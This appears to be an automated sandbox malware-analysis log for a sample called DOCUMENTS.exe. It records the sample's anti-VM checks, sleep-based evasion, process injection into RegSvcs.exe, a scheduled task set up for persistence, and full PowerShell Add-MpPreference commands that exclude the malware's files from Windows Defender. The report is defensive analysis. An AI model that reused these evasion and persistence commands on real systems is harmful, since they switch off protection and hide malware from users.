                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 9920000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: 9B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: AB10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: B170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: C170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: D170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 96C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: A6C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: ACD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F71C5D rdtsc 18_2_05F71C5D
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6548Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6439Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2128Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2743
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 444
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe TID: 7360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 6548 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 207 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe TID: 6132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99840Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99726Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99616Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99499Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99131Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98767
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98516
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98405
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98293
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                      Source: RegSvcs.exe, 00000012.00000002.2541816900.0000000005D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                      Source: RegSvcs.exe, 0000000D.00000002.1401122800.0000000006530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F71C5D rdtsc 18_2_05F71C5D
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11B4008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 816008Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Users\user\Desktop\DOCUMENTS.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
